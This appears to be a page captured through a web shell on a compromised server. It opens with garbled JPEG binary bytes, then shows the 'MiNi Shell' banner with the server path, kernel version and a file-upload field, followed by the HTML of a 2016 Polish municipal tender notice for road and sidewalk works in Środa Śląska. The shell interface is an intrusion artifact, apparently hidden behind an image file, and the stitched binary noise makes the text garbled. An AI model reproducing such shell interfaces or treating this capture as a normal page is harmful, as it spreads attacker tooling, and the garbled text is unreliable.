JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160921/311442-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 311442 - 2016
              z dnia 2016-09-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Środa Śląska: część I
1. Budowa nawierzchni odcinka ul. Mostowej do posesji 20 i 20B w Środzie Śląskiej
2. Budowa nawierzchni drogi ul. Brodatego i części ul. Probusa w Środzie Śląskiej wraz z kanalizacją deszczową
CZEŚĆ II
1. Budowa chodnika przy ul. Szkolnej i M. C. Skłodowskiej w Środzie Śląskiej  I ETAP
2. Budowa ciągu pieszo jezdnego łączącego ul. Wierzbową z osiedlem mieszkaniowym SM w Środzie Śląskiej,
3. Budowa chodnika  w miejscowości Komorniki w ramach zadania poprawa bezpieczeństwa na kluczowych odcinkach dróg na terenie miasta i gminy Środa Śląska,
CZĘŚĆ III
1. Rewitalizacja gminnego placu przy ul. Kościuszki 60 w Środzie Śląskiej
CZĘŚĆ IV
1. Budowa parkingu przy ul. Polnej nr 17 A  - 17 B w podstrefie LSSE w Komornikach <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina i Miasto Środa Śląska, krajowy numer identyfikacyjny
              69291493227000, ul.
              Plac Wolności 
              5,
              55300  
              Środa Śląska, woj.
              dolnośląskie, państwo
              , tel.
              713 960 724, e-mail
              izp_zap@srodaslaska.pl, faks
              713 173 405.
              <br />
              Adres strony internetowej (URL): bip.srodaslaska.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />bip.srodaslaska.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy złożyć w formie pisemnej. Ofertę należy złożyć w nieprzejrzystej i trwale zamkniętej kopercie lub opakowaniu.<br />
                Adres:
                <br />Gmina Środa Śląska, 55-300 Środa Śląska, Plac Wolności 5, (Wydział Zamówień Publicznych pokój B-13).   Składanie oferty odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r.  Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>część I
1. Budowa nawierzchni odcinka ul. Mostowej do posesji 20 i 20B w Środzie Śląskiej
2. Budowa nawierzchni drogi ul. Brodatego i części ul. Probusa w Środzie Śląskiej wraz z kanalizacją deszczową
CZEŚĆ II
1. Budowa chodnika przy ul. Szkolnej i M. C. Skłodowskiej w Środzie Śląskiej  I ETAP
2. Budowa ciągu pieszo jezdnego łączącego ul. Wierzbową z osiedlem mieszkaniowym SM w Środzie Śląskiej,
3. Budowa chodnika  w miejscowości Komorniki w ramach zadania poprawa bezpieczeństwa na kluczowych odcinkach dróg na terenie miasta i gminy Środa Śląska,
CZĘŚĆ III
1. Rewitalizacja gminnego placu przy ul. Kościuszki 60 w Środzie Śląskiej
CZĘŚĆ IV
1. Budowa parkingu przy ul. Polnej nr 17 A  - 17 B w podstrefie LSSE w Komornikach <br /><b>Numer referencyjny: </b>WZP 271.1-38/19<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>CZĘŚĆ i
1. Budowa nawierzchni odcinka ul. Mostowej do posesji 20 i 20B w Środzie Śląskiej
Projektuje się sięgacz o długości 130 m o nawierzchnie jednoprzestrzennej i szer. 4,50m.
W ciągu sięgacza projektuje się zjazdy na przylegające posesje.
Sięgacz będzie posiadał spadek jednostronny.
KONSTRUKCJA NAWIERZCHNI
Dla projektowanej nawierzchni ciągu pieszo-jezdnego i zjazdów przewidziano następujący układ warstw konstrukcyjnych:
- kostka bet. gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/31,5 gr. 10 cm
- kruszywo łamane stab. mechanicznie 0/63 gr. 20 cm
- piasek stabilizowany cementem Rm=2,5 MPa gr. 25 cm
Nawierzchnię należy obramować krawężnikiem betonowym 15x30 cm
posadowionym na ławie bet. C12/15 gr. 12 cm z oporem, a od strony spadku  krawężnikiem betonowym wtopionym najazdowym 15x22 cm.
Na szerokości zjazdów należy wbudować krawężnik betonowy najazdowy obniżony do 2 cm ponad poziom krawędzi jezdni.
Ściek należy wykonać z 2 rzędów kostki betonowej 10x20x8 cm posadowionej na ławie betonowej C12/15 gr. 24 cm.
ODWODNIENIE
Odwodnienie realizowane będzie powierzchniowo w teren poprzez spadki poprzeczne i podłużne nawierzchni powierzchniowo w teren. Dla odwodnienia projektowanej nawierzchni na odcinku o długości 60 m zaprojektowano ściek otwarty z 2 rzędów kostki betonowej.
ROBOTY ZIEMNE
Zasadnicze roboty ziemne sprowadzają się do wykonana korytowania i profilowania dna koryta.
Dno koryta lub górę nasypu należy zagęścić do uzyskania wskaźnika zagęszczenia Is1,0.
2. Budowa nawierzchni drogi ul. Brodatego i części ul. Probusa w Środzie Ślaskiej wraz z kanalizacją deszczową
Projektuje się jezdnię szer. 5,00 m na długości 136 mb. Jezdnia będzie posiadała spadek
daszkowy.
Po stronie zabudowy (wschodniej) projektuje się chodnik jednostronny.
Chodnik będzie posiadał szerokość 1,50 m i spadek jednostronny w kierunku jezdni wielkości 2%. W ciągu zjazdów spadek poprzeczny chodnika zostanie dostosowany do spadku projektowanych zjazdów.
Projektowane zjazdy będą posiadały szer. 3,50-5,00m. Zostaną włączone do jezdni skosami 1,5x1,5m.
Szczegóły  rozwiązań sytuacyjnych i  wysokościowych pokazano na planszy drogowej.
konstrukcja nawierzchni
Dla projektowanych nawierzchni przewidziano następujący układ warstw konstrukcyjnych:
Jezdnia:
- kostka bet. szara gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/31,5 gr. 10 cm
- kruszywo łamane stab. mechanicznie 0/63 gr. 20 cm
- piasek stab. cementem Rm=2,5 MPa gr. 15 cm
Zjazdy:
- kostka bet. grafitowa gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/63 gr. 15 cm
- pospółka gr. 20 cm
Chodniki/dojścia do furtek:
- kostka bet. szara gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/31,5 gr. 10 cm
- pospółka gr. 10 cm
Nawierzchnię jezdni należy obramować krawężnikiem bet. 15x30 cm na ławie bet. C12/15 gr. 15 cm z oporem.
Od  strony  zabudowy  należy  użyć krawężnika  najazdowego  obniżonego  na całej długości do 3 cm ponad poziom krawędzi jezdni.
Nawierzchnię chodników oraz zjazdów należy obramować obrzeżem betonowym 8x25 cm posadowionym na ławie bet. C12/15 gr. 12 cm z oporem.
Wzdłuż krawężników należy wykonać ściek z 2 rzędów kostki bet. Typu Holland na ławie betonowej wspólnej z krawężnikiem.
Szczegóły rozwiązań konstrukcyjnych pokazano na przekrojach konstrukcyjnych.
odwodnienie
Odwodnienie realizowane będzie przez spadki poprzeczne i podłużne nawierzchni do projektowanych oraz istniejących wpustów ulicznych kanalizacji deszczowej.
CZĘŚĆ II
1. Budowa chodnika przy ul. Szkolnej  i ul. M.C. Skłodowskiej w Środzie Ślaskiej  I etap 
W ramach niniejszego projektu zostanie wykonany jednostronny chodnik uliczny wzdłuż ul. Szkolnej i ul. Marii Curie Skłodowskiej. Chodnik ten, w nawiązaniu do istniejącej szerokości chodnika, będzie posiadał szer. 1,75 m. W ramach niniejszego projektu zostaną także przebudowane istniejące zjazdy oraz wykonane dojścia do poszczególnych posesji oraz boksów śmietnikowych. Wykonane zostaną także zjazdy na niezagospodarowane działki budowlane. Projektowany chodnik będzie posiadał spadek jednostronny w kierunku jezdni wielkości 2%. W ciągu zjazdów spadek poprzeczny chodnika zostanie dostosowany do spadku nawierzchni zjazdu. Wysokościowo projektowany chodnik zostanie dostosowany do niwelety istniejącego krawężnika. Istniejący krawężnik uliczny pozostaje bez zmian. Zjazdy zostaną wykonane o szerokości dostosowanej do szerokości istniejących bram i zjazdów.W ramach niniejszego projektu zostanie także wykonane przejście dla pieszych przez ul. Mickiewicza szer. 4,0 m. Na wysokości przejścia dla pieszych istniejący  krawężnik  uliczny zostanie  obniżony  do  2  cm  ponad  poziom krawędzi jezdni.
konstrukcja nawierzchni
Dla projektowanych nawierzchni przewidziano następujący układ warstw konstrukcyjnych:
Zjazdy:
- kostka bet. grafitowa gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/63 gr. 15 cm
- pospółka gr. 20 cm
Chodniki / dojścia do furtek:
- kostka bet. szara gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/31,5 gr. 10 cm
- pospółka gr. 10 cm
Nawierzchnię chodników oraz zjazdów należy obramować obrzeżem betonowym 8x25cm posadowionym na ławie bet. C12/15 gr. 12 cm z oporem.
Projektowane zjazdy należy dowiązać do istniejącego obniżonego krawężnika ulicznego. Przy nowych zjazdach należy wbudować krawężnik najazdowy 15x22cm obniżony do 2 cm ponad poziom krawędzi jezdni. Na wysokości przejścia dla pieszych istn. krawężnik należy obniżyć do 2 cm ponad poziom krawędzi jezdni. Krawężniki należy posadawiać na ławie bet. C12/15 gr. 15 cm z oporem. S
 odwodnienie
Odwodnienie powierzchniowe realizowane będzie przez spadki poprzeczne i podłużne projektowanych zjazdów i chodników  do istniejących wpustów ulicznych kanalizacji deszczowej zlokalizowanych w jezdniach poszczególnych ulic.
2. Budowa ciągu pieszo jezdnego łączącego ul. Wierzbową z osiedlem mieszkaniowym SM w Środzie Ślaskiej  
Długość ciągu pieszo jezdnego 70 mb i szerokości 4 m.
nawierzchnia:
- kostka bet. szara gr. 8 cm
- podsypka cem-piask. 1:4 gr. 3 cm
- kruszywo łamane stab. mechanicznie 0/63 gr. 15 cm
- pospółka gr. 20 cm
gr. 10 cm
Nawierzchnię chodników oraz zjazdów należy obramować obrzeżem betonowym 8x25cm posadowionym na ławie bet. C12/15 gr. 12 cm z oporem.
2. Budowa chodnika w miejscowości Komorniki 
Długość chodnika z kostki betonowej szarej wynosi 122 mb i szerokości od 1,30 do 1,65m . Zmienna szerokość wynika z warunków terenowych i zabudowy. Chodnik zostanie oddzielony od jezdni za pomocą krawężników kamiennych z odzysku i krawężników betonowych o wymiarach 15x 30 cm w miejscu braku krawężników betonowych. Zewnętrzne krawędzie chodnika zostaną zabezpieczone obrzeżami betonowymi o wymiarach 8x30 cm. Krawężniki jak i obrzeza zostaną posadowione na ławie z betonu klasy  C12/15
nawierzchnia chodników z kostki betonowej szarej gr 8 cm układana na podsypce cementowo-piaskowej. Podbudowa wykonana z kruszywa łamanego stabilizowanego mechanicznie o gr 10 cm. 
CZĘŚĆ III
Zadanie 1  
Rewitalizacja gminnego placu przy ul. Kościuszki 60 w Środzie Ślaskiej  Kanalizacja deszczowa :
Rurociąg z rur PVC SN 8  200  41m, PVC SN 8 160 - 54,8m
Wpusty uliczne w ilości 3szt. 
Studnie rewizyjne betonowe  1000 - 3szt.
Studnia rewizyjna 600 - 1szt.
Nawierzchnie z kostki granitowej :
Chodniki z płyt granitowych groszkowanych 600x600mm i grubości 100mm i powierzchni 14m2
Chodniki z płyt granitowych groszkowanych 600x600mm i grubości 60mm i powierzchni 52m2
Wypełnienie wykonywanych chodników z płyt kostką granitową 4/6 na powierzchni 78m2
Plac z kostki brukowej granitowej 8/11 na powierzchni 589m2.
Oświetlenie :
Oprawy oświetleniowe stylizowane (metalowe np. firmy ART METAL) ledowe o mocy 39W  - szt. 4 montowane na słupach aluminiowych stylizowanych.           
Linia zasilająca projektowane oprawy oświetleniowe YAKY 4x16mm2 i L=116m
	CZĘŚĆ IV
	- opracowanie dokumentacji projektowej parkingu dla branży drogowej i sanitarnej wraz z 	dokonaniem zgłoszenia robót lub pozwolenia na budowę
	- korytowanie placu parkingu na gł  20 cm  pow ca 1 158 m2
	- formowanie nasypów z pospółki o śr grubości 40 cm pow ca 1 158 m2
	- wykonanie gruntu stabilizowanego cementem gr 15 cm na pow ca 1 158 m2
	- wykonanie dolnej warstwy kruszywem 0/63 o gr 15  na pow  ca 1158 m2
	- wykonanie dolnej warstwy kruszywem 0/31,5 o gr 10  na pow ca  1158 m2
	- wykonanie nawierzchni z kostki betonowej szarej gr  8 cm na pow ca  1 158 m2
	- obramowanie placu postojowego krawężnikami drogowymi 15x30x100 na ławach betonowych z 	oporem
	- wykonanie odwodnienia placu parkingu
2. Szczegółowy opis zamówienia znajduje się w dokumentacji projektowo - kosztorysowej  stanowiącej załącznik do SIWZ, w skład której wchodzi: projekty budowlane, specyfikacje techniczne wykonania i odbioru robót budowlanych, decyzja pozwolenia na budowę, przedmiar
robót oraz  wzór  umowy.
3. Wykonawca jest odpowiedzialny za jakość prac i ich zgodność z dokumentacją projektowo kosztorysową, umową, specyfikacjami technicznymi, wyjaśnieniami do SIWZ i instrukcjami Zamawiającego, w tym polecenia Inspektora Nadzoru. Załączona do SIWZ dokumentacja projektowo  kosztorysowa i wszystkie dodatkowe dokumenty przekazane Wykonawcy stanowią część umowy, a wymagania określone w choćby jednym z nich są obowiązujące dla Wykonawcy tak jakby były zawarte w całej dokumentacji. W przypadku rozbieżności w ustaleniach  w poszczególnych dokumentach obowiązuje następująca kolejność ich ważności:
1)  Dokumentacja projektowa.
2)  Specyfikacja techniczna wykonania i odbioru robót budowlanych.
3)  Przedmiary robót.
4.   Podane w dokumentacji projektowej oraz przedmiarach robót nazwy własne materiałów należy
traktować jako przykładowe. Zamawiający dopuszcza w ofercie, a następnie zastosowanie podczas wykonywania robót innych równoważnych materiałów i urządzeń niż podane  w dokumentacji projektowej, pod warunkiem zapewnienia parametrów technicznych technologicznych, jakościowych i estetycznych nie gorszych niż określone w tej dokumentacji.
W takiej sytuacji Zamawiający wymagać będzie na etapie realizacji robót złożenia stosownych dokumentów, które uwiarygodnią proponowane przez Wykonawcę materiały i urządzenia.
Wykonawca proponujący urządzenia i materiały równoważne musi udowodnić, że proponowany element zamienny spełnia wymienione wymagania zarówno pod względem technicznym i jakościowym wraz z oświadczeniem, że proponowane urządzenie jest równoważne do zaproponowanego w dokumentacji, co do jego przeznaczenia. Przez pojęcie urządzeń i materiałów równoważnych należy rozumieć urządzenia i materiały gwarantujące realizację robót zgodnie z wydanym pozwoleniem na budowę oraz zapewniające uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych. Koniecznym jest podanie nazwy producenta,  precyzyjnego i jednoznacznego typu urządzenia lub materiału oraz załączenie niezbędnych dokumentów, takich jak: zdjęcie produktu, atest  PZH, deklaracja zgodności producenta/aprobata techniczna, karta katalogowa producenta zawierająca wszystkie parametry techniczno-eksploatacyjne wraz z    charakterystyką pracy urządzeń ujętych w dokumentacji projektowej.
Zamawiający nie wyraża zgody, aby proponowane urządzenia równoważne były prototypami lub urządzeniami testowymi. Wymogiem bezwzględnym jest, by były to urządzenia sprawdzone, pracujące na innych zrealizowanych obiektach. Zamawiający zastrzega sobie prawo dokonania oględzin i sprawdzenia działania urządzenia równoważnego pracującego na wskazanym obiekcie.
Wykonawca przedstawiając rozwiązania równoważne nie może naruszyć praw osób trzecich z tytułu patentów, znaków towarowych, praw autorskich i innych oraz oświadczyć, że wymagana dla realizacji przedmiotu umowy produkcja i sprzedaż nie jest prowadzona z naruszeniem zasad uczciwej konkurencji.
5. Zamawiający dopuszcza  wykonania przez podwykonawcę  części zamówienia na roboty budowlane.  
6. W przypadku powierzenia  wykonania części zamówienia  podwykonawcy Zamawiający żąda wskazanie  przez Wykonawcę w ofercie (formularzu ofertowym) części zamówienia, której wykonanie  zamierza powierzyć podwykonawcy, oraz  podanie przez Wykonawcę nazw (firm) podwykonawców, na których zasoby  wykonawca  powołuje się na zasadach określonych w art. 22 A ustawy Pzp, w celu wykazania  spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1  ustawy Pzp.
7. jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 22 A ustawy pzp,  w celu wykazania spełniania warunków  udziału w postępowaniu, o których mowa w art. 22 ust. ustawy pzp, wykonawca zobowiązany jest wykazać zamawiającemu, iż proponowany inny podwykonawca  lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż  wymagany w trakcie postępowania o udzielenie zamówienia.<br /><br /><b>II.5) Główny kod CPV: </b>45233140-2<br /><b> Dodatkowe kody CPV:</b>45232130-2,
                45316110-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                do  wysokości 50 % zamówienia podstawowego<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/11/2016<br /></div><div style="padding-left: 20px">
                    data zakończenia: 11/12/2016<br /></div><div style="padding-left: 20px">
                    data zakończenia: 18/12/2016<br /></div><div style="padding-left: 20px">
                    data zakończenia: 02/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Terminy zakończenia wymienione  sekcji II8 dot. realizacji zamówienia w Części I, II, III i IV</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Część I
